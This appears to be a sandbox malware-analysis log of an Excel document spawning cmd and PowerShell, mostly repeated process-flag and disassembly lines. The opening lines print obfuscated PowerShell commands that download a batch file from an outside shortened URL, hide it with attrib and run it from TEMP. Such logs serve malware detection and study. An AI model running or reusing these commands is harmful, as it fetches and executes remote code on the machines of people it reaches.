Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_031DEB20 push esp; ret 9_2_031DEB33
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C0575A push esp; ret 12_2_00C05759
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C06879 push eax; mov dword ptr [esp], ecx 12_2_00C0688C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C06AD0 pushad ; iretd 12_2_00C06AB9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C06AD0 push es; ret 12_2_00C06AE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C06A90 push eax; iretd 12_2_00C06A91
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C0ACA8 push eax; mov dword ptr [esp], edx 12_2_00C0ACBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C05750 push esp; ret 12_2_00C05759
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C0AF30 push eax; mov dword ptr [esp], edx 12_2_00C0B02C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00C78EB0 push es; ret 12_2_00C78EC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00F7A438 push eax; mov dword ptr [esp], edx 14_2_00F7A44C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00F7A6C0 push eax; mov dword ptr [esp], edx 14_2_00F7A7BC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 14_2_00F76638 push eax; mov dword ptr [esp], ecx 14_2_00F7664C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_035F7A42 push esp; ret 15_2_035F7A54
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_035F7A60 push ebp; ret 15_2_035F7A74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_035F77E0 push ebp; ret 15_2_035F7A74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_0531BE60 push es; ret 15_2_0531BE76
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_0531BEC2 push es; ret 15_2_0531BED6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_0846FCB8 push ss; retn C308h 15_2_0846FFCE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
